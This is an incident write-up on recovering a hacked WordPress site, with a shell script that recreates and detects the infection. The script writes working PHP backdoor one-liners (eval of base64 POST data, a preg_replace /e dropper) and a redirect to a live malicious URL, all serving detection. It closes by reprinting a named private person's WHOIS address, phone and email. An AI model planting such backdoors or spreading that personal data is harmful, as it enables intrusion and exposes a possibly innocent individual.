Securing hacked website // Malware infected website filled with backdoors
Mar. 14, 2017
This is a short presentation on how we encountered a hacked website, the countermeasures we took to recover the site from the malware, and how we applied Wordfence and Cloudflare protection afterwards.
What happened?
Richard, a grad student, notified us that there was an issue with one website
(http://www.bnaijacobjc.com/). He received credentials from the owner of the
website the next day so that we could help them fix it.
Anyone reaching this website from a Google search result or from a backlink
was being redirected, by a malicious script injected into the site, to drive-by
attack pages, video sites, advertisements and so on. A direct visit looked normal,
which is why the owner did not notice it.
And we finally fixed it after numerous countermeasures!
Multiple Issues
● Theme carrying malicious JS that redirected visitors to an advertising domain (http://portal-b.pw/XcTyTp)
  ^ NSFW: redirects to drive-by downloads, advertisements and porn
● Outdated WordPress version
● Multiple backdoors, which an attacker could use to regain access even after the visible redirect is removed
● Exploited RCE vulnerability in PHP's preg_replace() function (the usual vector is the deprecated /e modifier, which evaluates the replacement string as PHP code; it was removed in PHP 7)
Fixes / Countermeasures
● Identified recently changed files, ordered them by modification time, and removed the malicious ones
  Listing files modified in the last 3 days: $ find . -mtime -3
  (Caveat: an attacker can backdate a file's mtime with touch, but the inode change time cannot be reset without root, so also list files by change time using find's -ctime test.)
● Updated WordPress and installed security scanner plugins:
  Acunetix Secure WordPress
  Wordfence Security
● Analyzed the traffic pattern with Chrome Developer Tools
  Throttled the network in the Network panel (with "Preserve log" enabled) so each hop of the redirect chain stays visible instead of flashing past
● Identified the backdoor in one of the themes and removed it
  $ grep -nri "_wp_http_referer" .
  $ grep -nri "portal-b.pw" .
  (Caveat: _wp_http_referer is also the name of a legitimate WordPress hidden form field, so the first grep will hit wp-includes/ and wp-admin/ as well; the suspicious matches are the ones in theme and plugin files.)
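The triage above, as an added example that is not code from the original slides: a POSIX shell script that builds a constructed throwaway WordPress docroot (one legitimate core file and three constructed "infected" theme files, all written by the script), then runs the slides' find-by-mtime listing, a ctime variant, and the slides' greps for "_wp_http_referer" and "portal-b.pw". The two generic backdoor signatures it also greps for (eval(base64_decode and preg_replace with /e) and the filtering of wp-includes/ and wp-admin/ are my additions; the theme name sample-theme and every file's content are assumptions, not something recovered from the real site.

```shell
#!/bin/sh
# Added example (not from the original slides): the triage the slides describe,
# run against a constructed throwaway WordPress docroot so it works offline.
#   - recent_by_mtime / recent_by_ctime: the slides' "find . -mtime -3", plus a
#     ctime variant, because touch(1) can backdate mtime but not ctime (root only)
#   - indicator_hits: the slides' greps for "_wp_http_referer" and "portal-b.pw",
#     plus two generic backdoor signatures (eval(base64_decode and preg_replace /e)
#     that are my addition, not something the slides report
#   - indicator_hits_outside_core: drops wp-includes/ and wp-admin/ hits, because
#     _wp_http_referer is also a legitimate WordPress hidden-field name
set -u

INDICATORS="portal-b\.pw|_wp_http_referer|eval\(base64_decode|preg_replace\(.*/e[\"']"

# Build a constructed sample docroot: one legitimate core file and three
# constructed "infected" theme files. Prints the directory path.
make_sample_docroot() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-includes" "$root/wp-content/themes/sample-theme"
    # legitimate core code: WordPress really emits a hidden field with this name
    printf '%s\n' '<?php function wp_referer_field() { echo "<input type=\"hidden\" name=\"_wp_http_referer\" />"; }' \
        > "$root/wp-includes/functions.php"
    # constructed backdoor: abuses the familiar field name as a command channel
    printf '%s\n' '<?php if (isset($_POST["_wp_http_referer"])) { eval(base64_decode($_POST["_wp_http_referer"])); }' \
        > "$root/wp-content/themes/sample-theme/header.php"
    # constructed redirect script: fires only for visitors arriving from a search engine
    printf '%s\n' 'if (document.referrer.indexOf("google.") > -1) { location.href = "http://portal-b.pw/XcTyTp"; }' \
        > "$root/wp-content/themes/sample-theme/redirect.js"
    # constructed preg_replace /e dropper: the replacement string is evaluated as PHP
    printf '%s\n' '<?php preg_replace("/.*/e", $_REQUEST["c"], "");' \
        > "$root/wp-content/themes/sample-theme/footer.php"
    # simulate an attacker hiding the backdoor by backdating its modification time
    touch -t 201701010000 "$root/wp-content/themes/sample-theme/header.php"
    echo "$root"
}

# Files under $1 whose mtime is within the last $2 days, newest first.
recent_by_mtime() {
    find "$1" -type f -mtime "-$2" -exec ls -lt {} +
}

# Same, but by ctime (inode change time), which touch -t cannot rewrite.
recent_by_ctime() {
    find "$1" -type f -ctime "-$2" -exec ls -ltc {} +
}

# Every PHP/JS line under $1 matching one of the indicators, as file:line:text.
# /dev/null is passed so grep always prefixes the file name, even for one file.
indicator_hits() {
    find "$1" -type f \( -name '*.php' -o -name '*.js' \) \
        -exec grep -nE "$INDICATORS" /dev/null {} +
}

# The same hits with the WordPress core directories filtered out.
indicator_hits_outside_core() {
    indicator_hits "$1" | grep -vE '/wp-(includes|admin)/'
}

root=$(make_sample_docroot)
echo "== modified in last 3 days (mtime; the backdated backdoor is missing) =="
recent_by_mtime "$root" 3
echo "== changed in last 3 days (ctime; the backdated backdoor shows up) =="
recent_by_ctime "$root" 3
echo "== indicator hits outside WordPress core =="
indicator_hits_outside_core "$root"
rm -rf "$root"
```

Run it from any directory; it cleans up its own temp docroot. On a real site, point the functions at the docroot instead of make_sample_docroot's output and expect the unfiltered indicator_hits to include core files, which is exactly why the filtered variant exists.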
Infrastructure / access level used for the fixes:
● GoDaddy hosting with cPanel
● phpMyAdmin (DB access) to reset the wp-admin credentials
● SSH access to execute CLI commands (Linux)
Some findings about the attacker // appears to be using a pseudonym
● The portal-b.pw domain is used to circulate advertisements of all kinds.
● WHOIS on the domain points to someone in RU (the registrant data could be forged):
ID: C97505165-CNIC
Name: Dzhamaldin Budunov
Organization: Private Person
Street: molodezhnaya 16/2
City: s. Sokur
State/Province: Saratovskaya oblast
Postal Code: 421994
Country: RU
Phone: +7.9192930122
Email: ovodnevay@rambler.ru